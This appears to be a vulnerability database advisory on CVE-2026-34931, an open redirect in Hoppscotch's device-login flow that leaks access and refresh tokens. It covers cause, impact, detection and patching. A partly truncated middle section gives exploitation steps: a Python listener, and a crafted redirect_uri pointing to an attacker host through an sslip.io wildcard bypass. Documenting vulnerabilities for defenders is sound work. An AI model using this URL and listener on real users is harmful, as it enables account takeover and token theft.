
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34931 is an open redirect vulnerability (CWE-601) in Hoppscotch, an open-source API development ecosystem, that enables authentication token exfiltration and full account takeover. All versions of hoppscotch-backend up to and including 2026.2.1 are affected; the issue was patched in version 2026.3.0. The vulnerability was published on April 2, 2026, and was discovered by Aikido Security via their AI pentesting product. It carries a CVSS v3.1 base score of 9.6 (Critical) and a CVSS v4.0 base score of 8.5 (High) (GitHub Advisory, Feedly).
The root cause is improper validation of the redirect_uri parameter in Hoppscotch's device-login flow (CWE-601: URL Redirection to Untrusted Site). The /device-login endpoint accepts a user-supplied redirect_uri without adequately restricting it to trusted loopback addresses, allowing an attacker to supply a crafted URI such as http://localhost.<attacker-server>/device-token that exploits DNS wildcard bypass techniques (e.g., using services like sslip.io) to redirect the victim's browser — along with their access and refresh tokens — to an attacker-controlled server. Exploitation requires the victim to click a malicious link and then click "Proceed" on the device-login page, after which tokens are transmitted to the attacker's listener (GitHub Advisory). The fix, introduced in PR #6012, validates the redirect_uri to prevent token theft via DNS wildcard bypass (Hoppscotch Release).
Successful exploitation allows an unauthenticated attacker to steal a victim's access and refresh tokens, enabling full account takeover by authenticating to Hoppscotch as the victim. This results in high confidentiality and integrity impact — the attacker gains access to all API collections, environments, secrets, and workspace data belonging to the victim. Availability is not directly impacted, but compromised accounts in team or organizational workspaces could expose sensitive API credentials and enable lateral movement to connected systems (GitHub Advisory).
A proof-of-concept exploit with step-by-step instructions is publicly available in the official GitHub Security Advisory, including a crafted malicious URL and a Python listener script to capture exfiltrated tokens (GitHub Advisory). The vulnerability requires no privileges and only low-complexity user interaction (victim must click a link and confirm). As of the time of reporting, there is no evidence of active in-the-wild exploitation, and the CVE is not listed in the CISA KEV catalog. The EPSS score is approximately 0.041%, reflecting low but non-zero exploitation probability (Feedly).
http.server module on a chosen port) to capture incoming HTTP requests containing token parameters.redirect_uri parameter that bypasses loopback validation using a DNS wildcard service: http://<your-domain>/device-login?redirect_uri=http%3A%2F%2Flocalhost.<attacker-server>%2Fdevice-token (for IP-based servers, use localhost.89.167.52.207.sslip.io format).localhost.<external-ip>.sslip.io or other DNS wildcard bypass domains; requests to /device-token endpoint on non-local hosts./device-login with a redirect_uri parameter pointing to external or non-standard loopback addresses; repeated device-login flow initiations from the same user account in a short timeframe.redirect_uri values containing external domains or DNS wildcard patterns (e.g., sslip.io, nip.io) in device-login requests (GitHub Advisory).The primary remediation is to upgrade Hoppscotch (hoppscotch-backend Docker image) to version 2026.3.0 or later, which includes a fix that validates the redirect_uri parameter in the device-login flow to prevent DNS wildcard bypass and token theft (Hoppscotch Release). No official workaround is provided for users unable to upgrade immediately; however, restricting network access to the Hoppscotch instance and educating users to avoid clicking unsolicited links can reduce exposure. Enabling multi-factor authentication where supported can limit the impact of token compromise (Feedly).
The vulnerability was discovered by Aikido Security using their AI pentesting product and responsibly disclosed to the Hoppscotch team, who patched it in version 2026.3.0 released March 31, 2026 (GitHub Advisory). A technical write-up was published by Infinit Security covering the improper loopback redirect_uri validation in the device-login flow (Infinit Security). Community reaction has been limited, with the CVE noted in standard vulnerability tracking feeds and databases without significant broader media coverage.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."